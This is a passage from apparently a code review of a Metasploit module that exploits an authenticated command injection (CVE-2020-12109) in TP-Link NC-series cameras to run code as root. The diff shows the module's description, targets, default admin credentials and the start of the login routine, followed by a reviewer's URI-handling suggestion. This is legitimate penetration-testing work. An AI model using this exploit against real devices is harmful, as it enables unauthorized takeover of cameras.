modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb

```diff
@@ -0,0 +1,232 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection',
+      'Description' => %q{
+          TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, 
+          NC250, NC260, NC450) are vulnerable to an authenticated command
+          injection. In all devices except NC210, Despite a check on the name length in 
+          swSystemSetProductAliasCheck, no other checks are in place in order 
+          to prevent shell metacharacters from being introduced. The system name
+          would then be used in swBonjourStartHTTP as part of a shell command 
+          where arbitrary commands could be injected and executed as root. NC210 devices
+          cannot be exploited directly via /setsysname.cgi due to proper input
+          validation. NC210 devices are still vulnerable since swBonjourStartHTTP
+          did not perform any validation when reading the alias name from the
+          configuration file. The configuration file can be written, and code
+          execution can be achieved by combining this issue with CVE-2020-12110.
+      },
+      'Author'      =>
+        [
+          'Pietro Oliva <pietroliva[at]gmail.com>'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ]
+        ],
+      'DisclosureDate' => '29th April 2020',
+      'Platform'       => %w{ linux },
+      'Arch' => ARCH_MIPSLE,
+      'Targets'        =>
+        [
+          [ 'TP-Link NC200, NC220, NC230, NC250',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'TP-Link NC260, NC450',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the HTTP Server to wait for the ELF payload request', 60])
+      ])
+  end
+
+  def login
+    user = datastore['USERNAME']
+    pass = Base64.strict_encode64(datastore['PASSWORD'])
+    if target.name == 'TP-Link NC260, NC450'
+      pass=Rex::Text.md5(pass)
+    end
+    
+    print_status("Authenticating with #{user}:#{pass} ...")
+    begin
+      res= send_request_cgi({
+        'uri' => '/login.fcgi',
```

Comment:
Assuming `TARGETURI` is defined, for each request, `normalize_uri()` and `target_uri.path` can be used to build the proper uri and ensure no extra slashes are present.

```suggestion
        'uri' => normalize_uri(target_uri.path, 'login.fcgi'),
```